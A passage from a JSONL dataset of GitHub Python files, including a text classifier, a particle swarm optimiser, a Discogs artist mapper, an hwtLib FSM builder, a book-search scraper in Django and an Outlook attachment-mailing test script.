y_predicted)\n return accuracy, precision, recall, f1\n\naccuracy, precision, recall, f1 = get_metrics(y_test, y_predicted_counts)\nprint(\"accuracy = %.3f, precision = %.3f, recall = %.3f, f1 = %.3f\" % (accuracy, precision, recall, f1))\n\n#######################\n####################### TAILORED FROM STACK:\n\nimport numpy as np\nimport itertools\nfrom sklearn.metrics import confusion_matrix\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.winter):\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title, fontsize=30)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, fontsize=20)\n plt.yticks(tick_marks, classes, fontsize=20)\n \n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt), horizontalalignment=\"center\", \n color=\"white\" if cm[i, j] < thresh else \"black\", fontsize=40)\n \n plt.tight_layout()\n plt.ylabel('True label', fontsize=30)\n plt.xlabel('Predicted label', fontsize=30)\n\n return plt\n\n\ncm = confusion_matrix(y_test, y_predicted_counts)\nfig = plt.figure(figsize=(10, 10))\nplot = plot_confusion_matrix(cm, classes=['NOT ADAS','ADAS','Unsure'], normalize=False, title='Confusion matrix')\nplt.show()\nprint(cm)\n\ndef get_most_important_features(vectorizer, model, n=100):\n index_to_word = {v:k for k,v in vectorizer.vocabulary_.items()}\n \n # loop for each class\n classes ={}\n for class_index in range(model.coef_.shape[0]):\n word_importances = [(el, index_to_word[i]) for i,el in enumerate(model.coef_[class_index])]\n sorted_coeff = sorted(word_importances, key = lambda x : x[0], reverse=True)\n tops = sorted(sorted_coeff[:n], key = lambda x : x[0])\n bottom = sorted_coeff[-n:]\n classes[class_index] = {\n 'tops':tops,\n 'bottom':bottom\n }\n return classes\n\nimportance = get_most_important_features(count_vectorizer, clf, 100)\n\n\ndef plot_important_words(top_scores, top_words, bottom_scores, bottom_words, name):\n y_pos = np.arange(len(top_words))\n top_pairs = [(a,b) for a,b in zip(top_words, top_scores)]\n top_pairs = sorted(top_pairs, key=lambda x: x[1])\n \n bottom_pairs = [(a,b) for a,b in zip(bottom_words, bottom_scores)]\n bottom_pairs = sorted(bottom_pairs, key=lambda x: x[1], reverse=True)\n \n top_words = [a[0] for a in top_pairs]\n top_scores = [a[1] for a in top_pairs]\n \n bottom_words = [a[0] for a in bottom_pairs]\n bottom_scores = [a[1] for a in bottom_pairs]\n \n fig = plt.figure(figsize=(20, 30)) \n\n plt.subplot(121)\n plt.barh(y_pos,bottom_scores, align='center', alpha=0.5)\n plt.title('Not ADAS', fontsize=20)\n plt.yticks(y_pos, bottom_words, fontsize=14)\n plt.suptitle('Key words', fontsize=16)\n plt.xlabel('Importance', fontsize=20)\n \n plt.subplot(122)\n plt.barh(y_pos,top_scores, align='center', alpha=0.5)\n plt.title('ADAS', fontsize=20)\n plt.yticks(y_pos, top_words, fontsize=14)\n plt.suptitle(name, fontsize=16)\n plt.xlabel('Importance', fontsize=20)\n \n plt.subplots_adjust(wspace=0.8)\n plt.show()\n\ntop_scores = [a[0] for a in importance[0]['tops']]\ntop_words = [a[1] for a in importance[0]['tops']]\nbottom_scores = [a[0] for a in importance[0]['bottom']]\nbottom_words = [a[1] for a in importance[0]['bottom']]\n\nplot_important_words(top_scores, top_words, bottom_scores, bottom_words, \"Most important words for relevance\")\n\n\n#######################\n#######################\n\ndef tfidf(data):\n tfidf_vectorizer = TfidfVectorizer()\n\n train = tfidf_vectorizer.fit_transform(data)\n\n return train, tfidf_vectorizer\n\nX_train_tfidf, tfidf_vectorizer = tfidf(X_train)\nX_test_tfidf = tfidf_vectorizer.transform(X_test)\n\nclf_tfidf = LogisticRegression(C=30.0, class_weight='balanced', solver='newton-cg', \n multi_class='multinomial', n_jobs=-1, random_state=40)\nclf_tfidf.fit(X_train_tfidf, y_train)\n\ny_predicted_tfidf = clf_tfidf.predict(X_test_tfidf)\n\naccuracy_tfidf, precision_tfidf, recall_tfidf, f1_tfidf = get_metrics(y_test, y_predicted_tfidf)\nprint(\"accuracy = %.3f, precision = %.3f, recall = %.3f, f1 = %.3f\" % (accuracy_tfidf, precision_tfidf, \n recall_tfidf, f1_tfidf))\n\ncm2 = confusion_matrix(y_test, y_predicted_tfidf)\nfig = plt.figure(figsize=(10, 10))\nplot = plot_confusion_matrix(cm2, classes=['NOT ADAS','ADAS','Unsure'], normalize=False, title='Confusion matrix')\nplt.show()\nprint(\"TFIDF confusion matrix\")\nprint(cm2)\nprint(\"BoW confusion matrix\")\nprint(cm) \n\nimportance_tfidf = get_most_important_features(tfidf_vectorizer, clf_tfidf, 100)\n\n#######################\n####################### TAILORED FROM STACK:\n\ntop_scores = [a[0] for a in importance_tfidf[0]['tops']]\ntop_words = [a[1] for a in importance_tfidf[0]['tops']]\nbottom_scores = [a[0] for a in importance_tfidf[0]['bottom']]\nbottom_words = [a[1] for a in importance_tfidf[0]['bottom']]\n\nplot_important_words(top_scores, top_words, bottom_scores, bottom_words, \"Most important words for relevance\")\n\n#######################\n####################### \n\nimport pickle\nfilename = 'finalized_model.sav'\npickle.dump(clf_tfidf, open(filename, 'wb'))\n\ntrial = pd.read_csv('TEST_FILE.csv', low_memory = False)\n\nXtrial = trial['Value'].tolist()\nXtrial2 = tfidf_vectorizer.transform(Xtrial)\nYtrial = clf_tfidf.predict_proba(Xtrial2)[:,1]\n\ntrial['preds'] = Ytrial\n\n########### TO CALL ####################\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport pickle\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\npd.set_option('display.float_format', lambda x: '%.5f' % x)\n\nfilename = 'HOME/NLP/finalized_model.sav'\nloaded_model = pickle.load(open(filename, 'rb'))\ntfidf_vectorizer = pickle.load(open(\"/HOME/NLP/tfidf_vectorizer.pickle\", 'rb'))\n\ndef ADASprob(tgt_file):\n# tfidf_vectorizer = TfidfVectorizer()\n df = pd.read_csv(tgt_file, low_memory = False)\n Xtrial = df['Value'].fillna('BLANK').tolist()\n Xtrial2 = tfidf_vectorizer.transform(Xtrial) # tfidf_vectorizer scikit package\n Ytrial = loaded_model.predict_proba(Xtrial2)[:,1] # Return P(X == 1)\n df['ADAS PROB'] = Ytrial\n df['_merge'] = pd.Categorical(df['_merge'], [\"both\",\"right_only\", \"left_only\"])\n df = df.sort_values(by = ['_merge', 'ADAS PROB'], ascending = False)\n# df.to_csv(tgt_file)\n return df\n \n#Call\nADASprob('/HOME/audi_mapped_melt_flagged.csv')\n","repo_name":"The-Doc-P/Code","sub_path":"TfidfVectorizer_LogitReg.py","file_name":"TfidfVectorizer_LogitReg.py","file_ext":"py","file_size_in_byte":9565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2785184127","text":"def extravalcalc(row,col,maxmat):\n val = 0\n modval = (maxmat) % 2\n if row == col:\n return row\n elif row > col and modval == 1:\n return col\n elif row > col and modval == 0:\n return row+(row-col)\n elif row < col and modval == 0:\n return row\n else:\n return col+(col-row)\n \n \n pass\nres = []\nt = int(input())\nfor i in range(t):\n row,col = list(map(int,input().split()))\n maxmat = max(row,col)\n val = (maxmat-1)**2 + extravalcalc(row,col,maxmat)\n res.append(val)\n\nfor i in range(t):\n print(res[i])\n\n \n \n ","repo_name":"pradyutnathradhae/interview_Program","sub_path":"mixed_problems/number_spiral.py","file_name":"number_spiral.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73656684306","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 7 03:37:05 2023\r\n\r\n@author: msi-1\r\n\"\"\"\r\n\r\nimport numpy as np\r\n\r\n# PSO Parameters\r\nnumParticles = 50 # Number of particles in the swarm\r\nmaxIterations = 100 # Maximum number of iterations\r\nc1 = 2 # Cognitive coefficient\r\nc2 = 2 # Social coefficient\r\nw = 0.7 # Inertia weight\r\n\r\n# Problem-specific parameters\r\nDim = 2 # Dimensionality of the problem\r\n# Define your problem here, including the objective function and any constraints\r\n\r\n\r\n# Define the PSO function\r\ndef pso():\r\n # Initialize the swarm\r\n position = np.random.rand(numParticles, Dim) # Particle positions\r\n velocity = np.zeros((numParticles, Dim)) # Particle velocities\r\n personalBest = position.copy() # Personal best positions\r\n personalBestFitness = np.zeros(numParticles) + np.inf # Personal best fitness values\r\n globalBest = np.zeros(Dim) # Global best position\r\n globalBestFitness = np.inf # Global best fitness value\r\n\r\n # Main loop\r\n for iteration in range(maxIterations):\r\n # Evaluate fitness for each particle\r\n for i in range(numParticles):\r\n fitness = objective_function(position[i])\r\n\r\n # Update personal best if better fitness is found\r\n if fitness < personalBestFitness[i]:\r\n personalBest[i] = position[i]\r\n personalBestFitness[i] = fitness\r\n\r\n # Update global best if better fitness is found\r\n if fitness < globalBestFitness:\r\n globalBest = position[i]\r\n globalBestFitness = fitness\r\n\r\n # Update particle velocities and positions\r\n for i in range(numParticles):\r\n r1 = np.random.rand(Dim)\r\n r2 = np.random.rand(Dim)\r\n velocity[i] = w * velocity[i] \\\r\n + c1 * r1 * (personalBest[i] - position[i]) \\\r\n + c2 * r2 * (globalBest - position[i])\r\n position[i] = position[i] + velocity[i]\r\n\r\n # Apply any necessary constraints to the particle positions\r\n\r\n # Update fitness if necessary\r\n\r\n # Display current best fitness\r\n print(f'Iteration {iteration + 1}: Best Fitness = {globalBestFitness}')\r\n\r\n # Display final result\r\n print('Optimization Complete!')\r\n print(f'Best Fitness = {globalBestFitness}')\r\n print(f'Best Position = {globalBest}')\r\n\r\n\r\n# Define your objective function\r\ndef objective_function(x):\r\n # Define your objective function here\r\n return np.sum(x**2)\r\n \r\n\r\n\r\n# Run the PSO algorithm\r\npso()\r\n","repo_name":"prathu1812/Evolutionary_Algorithms","sub_path":"Evolutionary Algorithms/Python Codes/PSO.py","file_name":"PSO.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11002251882","text":"from dbBase import dbBase\nfrom searchUtils import findNearest\nfrom pandas import DataFrame, Series\n\n\n########################################################################################################\n#\n# Set Artist Database\n#\n########################################################################################################\nclass dbArtistMap():\n def __init__(self, db, known=False, debug=False):\n self.db = db\n self.debug = debug\n if debug:\n print(\"Getting DB Data For {0}\".format(db))\n \n try:\n self.disc = dbBase(db.lower())\n except:\n raise ValueError(\"Cannot create a dbBase() object with [{0}]\".format(db.lower()))\n \n self.discdf = None\n self.artists = None\n self.albumsDB = None\n self.artistIDToName = None\n self.artistNameToID = None\n self.artistAlbumsDB = None\n self.Nalbums = None\n self.known = known\n if debug:\n if self.known is True:\n print(\"Only Getting Known Artist DB Data\")\n else:\n print(\"Getting All Artist DB Data\")\n \n self.artistIDToName = None\n self.artistNameToID = None\n \n self.finalArtistName = \"CleanDiscArtist\"\n \n self.setArtistIDMap()\n self.setAlbumIDMap()\n self.summary()\n \n \n ########################################################################################################\n #\n # Get Artist ID Mapping\n #\n ########################################################################################################\n def getArtistIDFromName(self, artistName):\n if self.artistNameToID is None:\n self.setArtistIDMap()\n if self.artistNameToID.get(artistName) is None:\n print(\"Artist [{0}] is not a member of artistNameToID.\".format(artistName))\n return None\n artistID = self.artistNameToID[artistName]\n return artistID\n\n def getArtistNameFromID(self, artistID):\n if self.artistIDToName is None:\n self.setArtistIDMap()\n if self.artistIDToName.get(artistID) is None:\n print(\"Artist ID [{0}] is not a member of artistIDToName.\".format(artistID))\n return None\n artistName = self.artistIDToName[artistID]\n return artistName\n \n \n \n ########################################################################################################\n #\n # Set Artist ID Mapping\n #\n ########################################################################################################\n def setArtistIDMap(self):\n if self.debug:\n print(\" Getting Master Artist DB File ({0})\".format(self.db))\n\n if self.known is True:\n self.discdf = self.disc.getMasterKnownSlimArtistDiscogsDB()\n else:\n self.discdf = self.disc.getMasterSlimArtistDiscogsDB()\n \n self.artists = [x for x in list(self.discdf[self.finalArtistName]) if x is not None]\n if self.debug:\n print(\" Found {0} Artists in DB\".format(len(self.artists)))\n\n self.artistIDToName = self.discdf[self.finalArtistName].to_dict()\n self.artistNameToID = {}\n if self.debug:\n print(\" Found {0} ID -> Name entries\".format(len(self.artistIDToName)))\n\n if self.known is True:\n if self.debug is True:\n print(\" Only loading a subset of known artists into memory.\")\n for artistID,artistName in self.artistIDToName.items():\n if artistName is None:\n continue\n if self.artistNameToID.get(artistName) is None:\n self.artistNameToID[artistName] = []\n self.artistNameToID[artistName].append(artistID)\n if self.debug:\n print(\" Found {0} Name -> ID entries\".format(len(self.artistNameToID)))\n \n \n ########################################################################################################\n #\n # Set Artist Album ID Mapping\n #\n ########################################################################################################\n def setAlbumIDMap(self): \n if self.debug:\n print(\" Getting Master Artist Album DB File ({0})\".format(self.db))\n \n if self.known is True:\n self.albumsDB = self.disc.getMasterKnownArtistAlbumsDiscogsDB()\n else:\n self.albumsDB = self.disc.getMasterSlimArtistAlbumsDiscogsDB()\n \n if self.debug:\n if self.known is True:\n print(\" Only loading a subset of known artists into memory.\")\n print(\" Found {0} Artist Albums\".format(len(self.albumsDB)))\n \n if isinstance(self.albumsDB, DataFrame):\n if self.albumsDB.shape[0] == 0:\n self.albumsDB = Series()\n self.albumsDB.name = \"Albums\"\n return\n \n try:\n self.albumsDB = self.albumsDB[\"Albums\"]\n except:\n raise ValueError(\"Error getting Albums from Artist Albums Database\")\n \n \n \n ########################################################################################################\n #\n # Get Artist Data\n #\n ########################################################################################################\n def getNearestArtist(self, artistName, num=1, cutoff=0.9, debug=False):\n nearArtists = findNearest(artistName, self.getArtists(), num=num, cutoff=cutoff)\n if len(nearArtists) > 0:\n return nearArtists[0]\n return None\n\n \n def getArtistIDs(self, artistName, num=10, cutoff=0.7, debug=False):\n artistIDs = {}\n if self.artistNameToID.get(artistName) is not None:\n if debug is True:\n print(\"\\tReturning ArtistIDs for Found ArtistName: {0}\".format(artistName))\n artistIDs[artistName] = self.artistNameToID[artistName]\n return artistIDs\n elif num is None or cutoff is None:\n if debug is True:\n print(\"\\tReturning Nothing Because Artist: {0} Was Not Found\".format(artistName))\n return {}\n else:\n nearArtists = findNearest(artistName, self.getArtists(), num=num, cutoff=cutoff)\n if debug:\n print(\"Nearest Matches for: {0}\".format(artistName))\n for nearArtist in nearArtists:\n artistIDs[nearArtist] = self.artistNameToID[nearArtist]\n return artistIDs\n \n return artistIDs\n \n \n def getArtistAlbums(self, artistID, flatten=False):\n if self.albumsDB is None:\n raise ValueError(\"Artist Albums not set!\")\n \n if artistID is None:\n return {}\n \n if self.albumsDB.get(artistID) is None:\n print(\"# Artist ID [{0}] is not found in Albums DB [{1}]\".format(artistID, self.db))\n return {}\n \n if flatten is True:\n return self.flattenedArtistAlbums(self.albumsDB[artistID])\n return self.albumsDB[artistID]\n \n\n def flattenedArtistAlbums(self, vals):\n if vals is None:\n return []\n if isinstance(vals, dict):\n albums = []\n for k,v in vals.items():\n if isinstance(v, dict):\n for k2, v2 in v.items():\n albums.append(v2)\n elif isinstance(v, list):\n for v2 in v:\n albums.append(v2)\n else:\n raise ValueError(\"Need either a dict or list in flattenedArtistAlbums()\")\n return list(set(albums))\n if isinstance(vals, list):\n albums = []\n for v in vals():\n if isinstance(v, list):\n for v2 in v:\n albums.append(v2)\n else:\n raise ValueError(\"Need a list in flattenedArtistAlbums()\")\n return list(set(albums))\n return []\n\n \n \n ########################################################################################################\n #\n # Summarize Artist Data\n #\n ########################################################################################################\n def getArtists(self):\n return self.artists\n \n def getNartistIDs(self):\n return len(self.artistIDToName)\n\n def getNartistNames(self):\n return len(self.artistNameToID)\n \n def getNalbums(self):\n try:\n nAlbums = sum([[len(v2) for v2 in v.values()][0] for k,v in self.albumsDB.items()])\n except:\n nAlbums = 0\n return nAlbums\n \n \n \n def summary(self):\n print(\"Summary Statistics For DB: {0}\".format(self.db))\n print(\" Using Known Artists: {0}\".format(self.known))\n print(\" Found {0} ID -> Name entries\".format(self.getNartistIDs()))\n print(\" Found {0} Name -> ID entries\".format(self.getNartistNames()))\n print(\" Found {0} Albums\".format(self.getNalbums()))","repo_name":"tgadf/discogs","sub_path":"dbArtistMap.py","file_name":"dbArtistMap.py","file_ext":"py","file_size_in_byte":9344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17408812225","text":"from typing import Tuple, Dict, Set, List\n\nfrom hwt.pyUtils.arrayQuery import iter_with_last\nfrom hwtLib.abstract.frame_utils.join.state_trans_info import StateTransInfo\nfrom hwtLib.abstract.frame_utils.join.state_trans_item import StateTransItem\nfrom hwtLib.abstract.frame_utils.join.state_trans_table import StateTransTable\nfrom hwtLib.abstract.frame_utils.join.input_reg_val import InputRegInputVal\nfrom copy import deepcopy\n\n\ndef is_from_different_input(a: Tuple[int, int, int, int],\n b: Tuple[int, int, int, int],\n ):\n return a is None \\\n or b is None \\\n or a[0] != b[0]\n\n\ndef is_next_byte_from_same_input(a: Tuple[int, int, int, int],\n b: Tuple[int, int, int, int],\n ):\n return not is_from_different_input(a, b) and a[2] == (b[2] - 1)\n\n\ndef input_B_dst_to_fsm(word_bytes: int,\n input_cnt: int,\n input_B_dst: List[List[Set[\n Tuple[Tuple[int, int], int, int, int]\n ]]],\n can_be_zero_len_frame: List[bool]):\n \"\"\"\n :param word_bytes: number of bytes in output word\n :param input_cnt: number of input streams\n :param input_B_dst: list with mapping of input bytes to a output bytes in each state\n\n .. code-block::\n\n Format of input_B_dst is: List for each input\n in this list there are lists for each input byte\n in this list there are sets of byte destinations for each input byte\n byte destination is a tuple:\n state label, input index, time index, output byte index, input last flag\n\n :note: input_B_dst is produced by :func:`hwtLib.amba.axis_comp.frame_utils.join.FrameJoinUtils.resolve_input_bytes_destinations`\n \"\"\"\n # (out_frame_format_i, out_word_i): StateTransInfo\n sub_states: Dict[Tuple[int, int], StateTransInfo] = {}\n # create substates from input byte mux info\n for in_i, in_word_dst in enumerate(input_B_dst):\n for in_B_i, in_B_dsts in enumerate(in_word_dst):\n for (st_label,\n in_B_time,\n out_B_i,\n B_from_last_input_word) in in_B_dsts:\n st_label: Tuple[int, int]\n st = sub_states.get(st_label, None)\n if st is None:\n st = StateTransInfo(st_label, word_bytes, input_cnt)\n sub_states[st_label] = st\n st.set_output(out_B_i, in_i, in_B_time,\n in_B_i, B_from_last_input_word)\n\n # resolve max lookahead for each input\n max_lookahead_for_input: List[int] = [0 for _ in range(input_cnt)]\n for in_i, in_word_dst in enumerate(input_B_dst):\n for in_B_i, in_B_dsts in enumerate(in_word_dst):\n for st_label, in_B_time, out_B_i, _ in in_B_dsts:\n max_lookahead_for_input[in_i] = max(\n max_lookahead_for_input[in_i], in_B_time)\n\n # build fsm\n state_cnt = input_cnt\n tt = StateTransTable(\n word_bytes, max_lookahead_for_input, state_cnt)\n states_for_relict_processing: List[StateTransInfo] = []\n # for all possible in/out configurations\n for ss in sorted(sub_states.values(), key=lambda x: x.label):\n ss: StateTransInfo\n st_i = ss.get_state_i()\n next_ss = ss.get_next_substate(sub_states)\n if next_ss is None:\n next_st_i = 0\n else:\n next_st_i = next_ss.get_state_i()\n\n tr = StateTransItem(tt, st_i, next_st_i, int(next_ss is None))\n tt.state_trans[st_i].append(tr)\n o_prev = None\n for last, (out_B_i, o) in iter_with_last(enumerate(ss.outputs)):\n if o is None:\n o_prev = o\n # output byte is disconnected, which is default state\n continue\n # in_i - input stream index\n # in_t - input time (register index)\n (in_i, in_t, in_B_i, is_from_last_input_word) = o\n in_rec: InputRegInputVal = tr.input[in_i][in_t]\n # vld, keep required as we are planing to use this byte in output\n in_rec.keep[in_B_i] = 1\n in_rec.last = is_from_last_input_word\n tr.out_byte_mux_sel[out_B_i] = (in_i, in_t, in_B_i)\n tr.input_rd[in_i] = 1\n # next keep = 0 because this byte will be consumed\n tr.input_keep_mask[in_i][in_t][in_B_i] = 0\n tr.output_keep[out_B_i] = 1\n\n if last:\n o_next = next_ss.outputs[0] if next_ss is not None else None\n else:\n o_next = ss.outputs[out_B_i + 1]\n\n if o_next is not None:\n assert o[0] <= o_next[0]\n\n is_input_word_continuing_in_next_out_word = last \\\n and next_ss is not None \\\n and is_next_byte_from_same_input(o, o_next)\\\n and in_B_i != word_bytes - 1\n\n if is_input_word_continuing_in_next_out_word:\n assert next_ss is not None\n states_for_relict_processing.append(next_ss)\n\n is_first_input_byte = is_from_different_input(o_prev, o)\n # is last byte from input byte in this output word\n is_last_input_byte = is_from_different_input(o, o_next)\n\n if is_last_input_byte:\n assert not is_input_word_continuing_in_next_out_word\n # iterate for all inputs until next input or end (if there are not any) and\n # mark its input keep with 0 and last with 1 to mark for 0B frame input\n next_input_i = input_cnt if o_next is None else o_next[0]\n for skipped_input_i in range(in_i + 1, next_input_i):\n _in_rec: InputRegInputVal = tr.input[skipped_input_i][0]\n _in_rec.last = 1\n _in_rec.keep = [0 for _ in _in_rec.keep]\n _in_rec.relict = 1\n tr.input_rd[skipped_input_i] = 1\n tr.input_keep_mask[skipped_input_i][0] = [0 for _ in range(word_bytes)]\n\n next_input_can_be_zero_len = not is_input_word_continuing_in_next_out_word and\\\n o_next is not None \\\n and can_be_zero_len_frame[next_input_i]\n if next_input_can_be_zero_len:\n # mark that the next_input does not have 0B frame\n # to distinguish between the transitions which are skipping the input\n assert o_next is not None\n (next_in_i, next_in_t, next_in_B_i, _) = o_next\n next_in_rec: InputRegInputVal = tr.input[next_in_i][next_in_t]\n # vld, keep required as we are planing to use this byte in output in the future\n next_in_rec.keep[next_in_B_i] = 1\n\n if is_first_input_byte:\n if in_B_i != 0:\n # mark leading zero\n for i in range(0, in_B_i):\n in_rec.keep[i] = 0\n\n if (is_last_input_byte \\\n or is_input_word_continuing_in_next_out_word\\\n or last) \\\n and (\n not (is_from_last_input_word \\\n and is_last_input_byte \\\n and in_B_i == word_bytes - 1)):\n # mark keep for next input byte\n if not is_from_last_input_word or is_input_word_continuing_in_next_out_word:\n # the next input byte is present because we are not in last input word\n # or this may be a last word but it is not fully consumed\n next_B_keep = 1\n else:\n # no more bytes from this input stream\n next_B_keep = 0\n\n if in_B_i == word_bytes - 1:\n # because pipeline will shift next time\n in_t += 1\n\n input_val = tr.input[in_i]\n if in_t < len(input_val):\n next_keep = input_val[in_t].keep\n next_keep[(in_B_i + 1) % word_bytes] = next_B_keep\n\n o_prev = o\n\n # if we are checking the input keep==0 set keep_mask=0 as well\n # (not required, to make clear that the byte will not be used in code)\n for in_meta, in_keep_mask in zip(tr.input, tr.input_keep_mask):\n for in_i, in_inputs in enumerate(in_meta):\n for B_i, k in enumerate(in_inputs.keep):\n if k is not None and k == 0:\n in_keep_mask[in_i][B_i] = 0\n\n # mark relict flag\n first_input_is_relict = ss in states_for_relict_processing\n for o in ss.outputs:\n if o is None:\n # skip start padding\n continue\n\n (in_i, in_t, in_B_i, _) = o\n v = tr.input[in_i][in_t]\n if v.last:\n # relict flag matters only for word with last flag set\n # because it is used to distinguis starts of single word frames\n # where only part of the word can be consumed to a output word\n v.relict = int(first_input_is_relict)\n break\n\n if can_be_zero_len_frame[0]:\n # The previous code generates the transition starting\n # from the state corresponding to a minimal index of input used in it and the starting\n # state is 0, thus all cases where some prefix input was 0B frame now starting in non starting state\n prefix_zero_len_inputs_cnt = 0\n for can_0B in can_be_zero_len_frame:\n if can_0B:\n prefix_zero_len_inputs_cnt += 1\n else:\n break\n\n for orig_st_i in range(1, min(prefix_zero_len_inputs_cnt + 1, input_cnt)):\n for tr in tt.state_trans[orig_st_i]:\n new_tr: StateTransItem = deepcopy(tr)\n new_tr.state = 0\n # wait and consume 0B frames from all inputs where it is expected\n for input_with_0B_i in range(tr.state):\n in_rec: InputRegInputVal = new_tr.input[input_with_0B_i][0]\n in_rec.keep = [0 for _ in range(word_bytes)]\n in_rec.last = 1\n in_rec.relict = 1\n new_tr.input_rd[input_with_0B_i] = 1\n new_tr.input_keep_mask[input_with_0B_i][0] = [0 for _ in range(word_bytes)]\n\n tt.state_trans[0].append(new_tr)\n\n if prefix_zero_len_inputs_cnt == input_cnt:\n # everythin can be 0B frame, we need to add a special transition exactly for that\n # because we did not process it by previous code because it looks only on output bytes\n # and there are not output bytes\n tr = StateTransItem(tt, 0, 0, 1)\n tt.state_trans[0].append(tr)\n for in_recs in tr.input:\n in_rec: InputRegInputVal = in_recs[0]\n in_rec.last = 1\n in_rec.keep = [0 for _ in in_rec.keep]\n in_rec.relict = 1\n\n for skipped_input in tr.input_keep_mask:\n skipped_input[0] = [0 for _ in range(word_bytes)]\n\n tr.last = 1\n tr.input_rd = [1 for _ in tr.input_rd]\n\n tt.filter_unique_state_trans()\n tt.assert_transitions_deterministic()\n return tt\n\n","repo_name":"Nic30/hwtLib","sub_path":"hwtLib/abstract/frame_utils/join/fsm.py","file_name":"fsm.py","file_ext":"py","file_size_in_byte":11542,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"35860396542","text":"from true_project import *\nimport warnings\n\nwarnings.filterwarnings('ignore')\n'''\nwhile True:\n print(\"Введите вопрос: \")\n question = input()\n if question == \"exit\":\n break'''\nanswer = good_answer('президент', df_stack_questions, df_stack_answers, df_quest_ans_mail_ans)\nprint(answer)\nanswer = good_answer('бинарное дерево', df_stack_questions, df_stack_answers, df_quest_ans_mail_ans)\nprint(answer)\nanswer = good_answer(\"вывав\", df_stack_questions, df_stack_answers, df_quest_ans_mail_ans)\nprint(answer)\n\n","repo_name":"Danr0/VKbot","sub_path":"project/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40302173042","text":"import requests\nfrom requests.compat import quote_plus\nfrom django.shortcuts import render\nfrom . import models\nfrom bs4 import BeautifulSoup\n\n# Create your views here.\nbase_url='http://gen.lib.rus.ec'\nmain_url=base_url+'/search.php?req={}&open=0&res=50&view=simple&phrase=1&column={}'\ndef home(request):\n return(render(request, 'book_app/home.html'))\n\n\ndef new_search(request):\n try:\n search= request.POST.get('search')\n search_type = request.POST.get('Search_type')\n\n models.Search.objects.create(search=search,type=search_type)\n\n url_f=main_url.format(quote_plus(search),search_type)\n for_front_data,check=get_data_on_book(url_f)\n\n except:\n for_front_data = []\n check = -1\n search=''\n\n checks=str(check)\n data_to_send={\n 'for_front_data':for_front_data,\n 'checks':checks,\n 'search':search,\n }\n return render(request,\"book_app/new_search.html\",data_to_send)\n\n\ndef get_data_on_book(url_f):\n for_front_data = []\n check = 0\n try:\n response = requests.get(url_f)\n page_html = response.text\n\n page_data = BeautifulSoup(page_html, features='html.parser')\n\n post_data = page_data.find_all('tr', {'valign': 'top', 'bgcolor': ('#C6DEFF', '')})\n except:\n return\n\n for post in post_data:\n\n try:\n\n check += 1\n\n ## all the required data from the page in text form ##\n book = post.find_all('td')\n book_id = book[0].text\n book_data = book[2].find('a', {'id': book_id})\n book_author = book[1].find_all('a')\n book_year = book[4].text\n book_lng = book[6].text\n book_size = book[7].text\n book_link = book[9].find('a').get('href', \"\")\n book_formate = book[8].text\n\n picture_url=\"\"\n\n ## go get at max three author name of the book ##\n author = \"\"\n i = 0\n for name in book_author:\n if author != \"\":\n author += \", \"\n author = author + name.text\n i += 1\n if (i == 3):\n break\n\n ## to get titel of the book ##\n ext = book_data.find_all('i')\n ex = \"\"\n p = 0\n for i in ext:\n p = 1\n ex = ex + i.text\n\n book_title = book_data.text\n if p == 1:\n book_name = book_title[:len(book_title) - len(ex) - 1]\n else:\n book_name = book_title\n\n for_front_data.append(\n (book_name,\n author,\n book_lng,\n book_year,\n book_link,\n book_formate,\n picture_url,\n book_size,\n book_id))\n except :\n pass\n\n return((for_front_data,check))","repo_name":"Dhrutiman/my_book","sub_path":"book_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"19615621041","text":"#!usr/bin/python3\n#-*-coding:utf-8 -*-\n\nimport win32com.client\nimport time,os\nimport warnings\nimport pythoncom\nimport sys\n\ndef sendmail(sub,body,reciever,addfiles):\n outlook=win32com.client.Dispatch(\"outlook.application\")\n mail=outlook.CreateItem(0)\n mail.To=reciever\n #mail.Subject=sub.decode('utf-8')\n #mail.Body=body.decode('utf-8')\n for item in addfiles:\n mail.Attachments.Add(item)\n mail.Send()\n\nif __name__==\"__main__\":\n sub='outlook python mail test'\n body='my test \\r\\n my python mail'\n reciever=\"ting@XX.com\"\n\n## addfiles=[r\"F:\\移动\",\n## ]\n fpath = r\"F:\\移动\"\n fname_list = os.listdir(fpath)\n addfiles = []\n for item in fname_list:\n addfiles.append(os.path.join(fpath,item))\n print(addfiles)\n sendmail(sub,body,reciever,addfiles)\n print(\"send email success\")\n \n \n\n\n\n\n\n\n","repo_name":"mu683yue/learn_and_exe_python_upTogit","sub_path":"learnPy/python_test_coding/CS_test/csfile_test/outlook_send_email.py","file_name":"outlook_send_email.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20273880117","text":"\"\"\"empty message\n\nRevision ID: f09275db1589\nRevises: \nCreate Date: 2019-10-11 11:31:29.333280\n\n\"\"\"\nimport sqlalchemy as sa\nimport sqlalchemy_utils\nfrom alembic import op\n\nGENDER = [('man', 'Man'),\n ('woman', 